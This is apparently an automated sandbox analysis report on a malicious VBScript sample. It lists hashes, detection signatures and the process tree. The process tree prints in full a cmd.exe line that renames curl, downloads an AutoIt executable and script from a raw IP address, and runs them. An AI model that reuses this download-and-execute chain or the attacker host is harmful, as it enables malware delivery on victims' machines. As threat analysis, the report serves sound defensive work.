Analysis
-
max time kernel
118s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20230831-en -
resource tags
arch:x64arch:x86image:win7-20230831-enlocale:en-usos:windows7-x64system -
submitted
02/10/2023, 13:33
Static task
static1
Behavioral task
behavioral1
Sample
mkpub_XJZ.vbs
Resource
win7-20230831-en
4 signatures
150 seconds
General
-
Target
mkpub_XJZ.vbs
-
Size
3KB
-
MD5
f291fb33af097675047e8818db037f7a
-
SHA1
a3c614d7d71468d9a1018935fdcd5891c24c027c
-
SHA256
8fa02af99bf10e756bc61dd214f3470ac85c2eb646c78f8fd2aa7932bc72c6bb
-
SHA512
96c61b9ed56f3ea2545da04be878d46f98e056f37852176ffc02f986e3499a6af47cacb2bbf7a881a7bd117d09a5438f4ad03902f9fccc8f0fc0275f44e6b934
Score
8/10
Malware Config
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 2 2724 WScript.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 2 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 2724 wrote to memory of 3008 2724 WScript.exe 28 PID 2724 wrote to memory of 3008 2724 WScript.exe 28 PID 2724 wrote to memory of 3008 2724 WScript.exe 28
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\mkpub_XJZ.vbs"1⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:2724 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c mkdir c:\rqdp & cd /d c:\rqdp & copy c:\windows\system32\curl.exe rqdp.exe & rqdp -H "User-Agent: curl" -o Autoit3.exe http://81.19.135.17:2351 & rqdp -o ccwpjf.au3 http://81.19.135.17:2351/msirqdppgyg & Autoit3.exe ccwpjf.au32⤵PID:3008
-